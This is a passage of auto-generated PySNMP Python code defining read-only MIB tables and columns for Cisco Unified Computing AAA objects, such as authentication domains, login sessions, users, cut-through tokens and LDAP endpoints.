cucsAaaDomainDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainDn.setStatus('current')
cucsAaaDomainRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainRn.setStatus('current')
cucsAaaDomainDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainDescr.setStatus('current')
cucsAaaDomainName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainName.setStatus('current')
cucsAaaDomainRefreshPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainRefreshPeriod.setStatus('current')
cucsAaaDomainSessionTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainSessionTimeout.setStatus('current')
cucsAaaDomainConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 9), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainConfigState.setStatus('current')
cucsAaaDomainConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainConfigStatusMessage.setStatus('current')
cucsAaaDomainAuthTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5), )
if mibBuilder.loadTexts: cucsAaaDomainAuthTable.setStatus('current')
cucsAaaDomainAuthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaDomainAuthInstanceId"))
if mibBuilder.loadTexts: cucsAaaDomainAuthEntry.setStatus('current')
cucsAaaDomainAuthInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaDomainAuthInstanceId.setStatus('current')
cucsAaaDomainAuthDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthDn.setStatus('current')
cucsAaaDomainAuthRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthRn.setStatus('current')
cucsAaaDomainAuthDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthDescr.setStatus('current')
cucsAaaDomainAuthName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthName.setStatus('current')
cucsAaaDomainAuthProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthProviderGroup.setStatus('current')
cucsAaaDomainAuthRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 8), CucsAaaDomainAuthRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthRealm.setStatus('current')
cucsAaaDomainAuthOperProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthOperProviderGroup.setStatus('current')
cucsAaaDomainAuthOperRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 10), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthOperRealm.setStatus('current')
cucsAaaDomainAuthUse2Factor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 11), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthUse2Factor.setStatus('current')
cucsAaaEpAuthProfileTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6), )
if mibBuilder.loadTexts: cucsAaaEpAuthProfileTable.setStatus('current')
cucsAaaEpAuthProfileEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpAuthProfileInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpAuthProfileEntry.setStatus('current')
cucsAaaEpAuthProfileInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpAuthProfileInstanceId.setStatus('current')
cucsAaaEpAuthProfileDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileDn.setStatus('current')
cucsAaaEpAuthProfileRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileRn.setStatus('current')
cucsAaaEpAuthProfileDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileDescr.setStatus('current')
cucsAaaEpAuthProfileIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileIntId.setStatus('current')
cucsAaaEpAuthProfileName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileName.setStatus('current')
cucsAaaEpAuthProfilePolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfilePolicyLevel.setStatus('current')
cucsAaaEpAuthProfilePolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 8), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfilePolicyOwner.setStatus('current')
cucsAaaEpAuthProfileIpmiOverLan = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 9), CucsAaaIpmiOverLan()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileIpmiOverLan.setStatus('current')
cucsAaaEpFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43), )
if mibBuilder.loadTexts: cucsAaaEpFsmTable.setStatus('current')
cucsAaaEpFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpFsmEntry.setStatus('current')
cucsAaaEpFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpFsmInstanceId.setStatus('current')
cucsAaaEpFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmDn.setStatus('current')
cucsAaaEpFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmRn.setStatus('current')
cucsAaaEpFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmCompletionTime.setStatus('current')
cucsAaaEpFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 5), CucsAaaEpFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmCurrentFsm.setStatus('current')
cucsAaaEpFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmDescr.setStatus('current')
cucsAaaEpFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmFsmStatus.setStatus('current')
cucsAaaEpFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmProgress.setStatus('current')
cucsAaaEpFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmRmtErrCode.setStatus('current')
cucsAaaEpFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmRmtErrDescr.setStatus('current')
cucsAaaEpFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmRmtRslt.setStatus('current')
cucsAaaEpFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44), )
if mibBuilder.loadTexts: cucsAaaEpFsmStageTable.setStatus('current')
cucsAaaEpFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpFsmStageEntry.setStatus('current')
cucsAaaEpFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpFsmStageInstanceId.setStatus('current')
cucsAaaEpFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageDn.setStatus('current')
cucsAaaEpFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageRn.setStatus('current')
cucsAaaEpFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageDescr.setStatus('current')
cucsAaaEpFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageLastUpdateTime.setStatus('current')
cucsAaaEpFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 6), CucsAaaEpFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageName.setStatus('current')
cucsAaaEpFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageOrder.setStatus('current')
cucsAaaEpFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageRetry.setStatus('current')
cucsAaaEpFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageStageStatus.setStatus('current')
cucsAaaEpFsmTaskTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7), )
if mibBuilder.loadTexts: cucsAaaEpFsmTaskTable.setStatus('current')
cucsAaaEpFsmTaskEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpFsmTaskInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpFsmTaskEntry.setStatus('current')
cucsAaaEpFsmTaskInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpFsmTaskInstanceId.setStatus('current')
cucsAaaEpFsmTaskDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskDn.setStatus('current')
cucsAaaEpFsmTaskRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskRn.setStatus('current')
cucsAaaEpFsmTaskCompletion = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 4), CucsFsmCompletion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskCompletion.setStatus('current')
cucsAaaEpFsmTaskFlags = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 5), CucsFsmFlags()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskFlags.setStatus('current')
cucsAaaEpFsmTaskItem = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 6), CucsAaaEpFsmTaskItem()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskItem.setStatus('current')
cucsAaaEpFsmTaskSeqId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskSeqId.setStatus('current')
cucsAaaEpLoginTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8), )
if mibBuilder.loadTexts: cucsAaaEpLoginTable.setStatus('current')
cucsAaaEpLoginEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpLoginInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpLoginEntry.setStatus('current')
cucsAaaEpLoginInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpLoginInstanceId.setStatus('current')
cucsAaaEpLoginDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginDn.setStatus('current')
cucsAaaEpLoginRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginRn.setStatus('current')
cucsAaaEpLoginDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginDescr.setStatus('current')
cucsAaaEpLoginId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginId.setStatus('current')
cucsAaaEpLoginIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginIntId.setStatus('current')
cucsAaaEpLoginLocalHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginLocalHost.setStatus('current')
cucsAaaEpLoginName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginName.setStatus('current')
cucsAaaEpLoginRemoteHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginRemoteHost.setStatus('current')
cucsAaaEpLoginSession = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 10), CucsAaaSession()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginSession.setStatus('current')
cucsAaaEpLoginSwitchId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 11), CucsNetworkSwitchId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginSwitchId.setStatus('current')
cucsAaaEpLoginPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginPolicyLevel.setStatus('current')
cucsAaaEpLoginPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 13), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginPolicyOwner.setStatus('current')
cucsAaaEpUserTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9), )
if mibBuilder.loadTexts: cucsAaaEpUserTable.setStatus('current')
cucsAaaEpUserEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpUserInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpUserEntry.setStatus('current')
cucsAaaEpUserInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpUserInstanceId.setStatus('current')
cucsAaaEpUserDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserDn.setStatus('current')
cucsAaaEpUserRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserRn.setStatus('current')
cucsAaaEpUserDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserDescr.setStatus('current')
cucsAaaEpUserName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserName.setStatus('current')
cucsAaaEpUserPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 7), CucsAaaEpAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserPriv.setStatus('current')
cucsAaaEpUserPwd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserPwd.setStatus('current')
cucsAaaEpUserPwdSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserPwdSet.setStatus('current')
cucsAaaEpUserConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 10), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserConfigState.setStatus('current')
cucsAaaEpUserConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserConfigStatusMessage.setStatus('current')
cucsAaaEpUserIsPwdEnc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 14), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserIsPwdEnc.setStatus('current')
cucsAaaExtMgmtCutThruTknTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10), )
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknTable.setStatus('current')
cucsAaaExtMgmtCutThruTknEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaExtMgmtCutThruTknInstanceId"))
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknEntry.setStatus('current')
cucsAaaExtMgmtCutThruTknInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknInstanceId.setStatus('current')
cucsAaaExtMgmtCutThruTknDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknDn.setStatus('current')
cucsAaaExtMgmtCutThruTknRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknRn.setStatus('current')
cucsAaaExtMgmtCutThruTknAuthUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknAuthUser.setStatus('current')
cucsAaaExtMgmtCutThruTknDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknDescr.setStatus('current')
cucsAaaExtMgmtCutThruTknIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknIntId.setStatus('current')
cucsAaaExtMgmtCutThruTknLocales = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknLocales.setStatus('current')
cucsAaaExtMgmtCutThruTknName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknName.setStatus('current')
cucsAaaExtMgmtCutThruTknPnDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknPnDn.setStatus('current')
cucsAaaExtMgmtCutThruTknPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 10), CucsAaaAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknPriv.setStatus('current')
cucsAaaExtMgmtCutThruTknRemote = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 11), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknRemote.setStatus('current')
cucsAaaExtMgmtCutThruTknToken = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknToken.setStatus('current')
cucsAaaExtMgmtCutThruTknType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 13), CucsAaaExtMgmtAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknType.setStatus('current')
cucsAaaExtMgmtCutThruTknUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 14), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknUser.setStatus('current')
cucsAaaExtMgmtCutThruTknCreationTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 15), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknCreationTime.setStatus('current')
cucsAaaExtMgmtCutThruTknAuthDomain = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknAuthDomain.setStatus('current')
cucsAaaExtMgmtCutThruTknPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 17), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknPolicyLevel.setStatus('current')
cucsAaaExtMgmtCutThruTknPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 18), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknPolicyOwner.setStatus('current')
cucsAaaLdapEpTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11), )
if mibBuilder.loadTexts: cucsAaaLdapEpTable.setStatus('current')
cucsAaaLdapEpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapEpInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapEpEntry.setStatus('current')
cucsAaaLdapEpInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapEpInstanceId.setStatus('current')
cucsAaaLdapEpDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpDn.setStatus('current')
